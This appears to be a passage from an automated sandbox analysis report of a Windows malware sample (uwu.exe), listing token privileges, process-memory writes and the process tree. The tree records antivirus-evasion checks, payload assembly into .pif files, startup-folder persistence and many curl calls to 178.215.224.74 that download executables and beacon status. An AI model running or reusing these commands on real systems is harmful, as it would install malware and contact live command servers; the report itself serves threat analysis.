Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Robocopy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3544 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 3544 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 3544 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1416 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 3700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1416 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 1416 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 1416 wrote to memory of 1208 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 1416 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1416 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1416 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1208 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1720 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1720 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1720 wrote to memory of 4320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1208 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2824 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 2824 wrote to memory of 2272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1208 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 5012 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5012 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 5012 wrote to memory of 2024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1208 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1460 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1460 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 1208 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 1208 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 3432 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\uwu.exe

"C:\Users\Admin\AppData\Local\Temp\uwu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 226443

C:\Windows\SysWOW64\findstr.exe

findstr /V "AthleticsTabletsUserImaging" Slovenia

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d

C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

Crossword.pif d

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\699 2>&1

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\699 > C:\Users\Admin\AppData\Local\temp\457

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip

C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

azvw.exe -o xhwq.zip

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\SysWOW64\findstr.exe

findstr /C:"OS Name"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"

C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe

"C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 303482

C:\Windows\SysWOW64\findstr.exe

findstr /V "OVERTOOLBARALOTNHL" Weeks

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f

C:\Users\Admin\AppData\Local\Temp\303482\Either.pif

Either.pif f

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

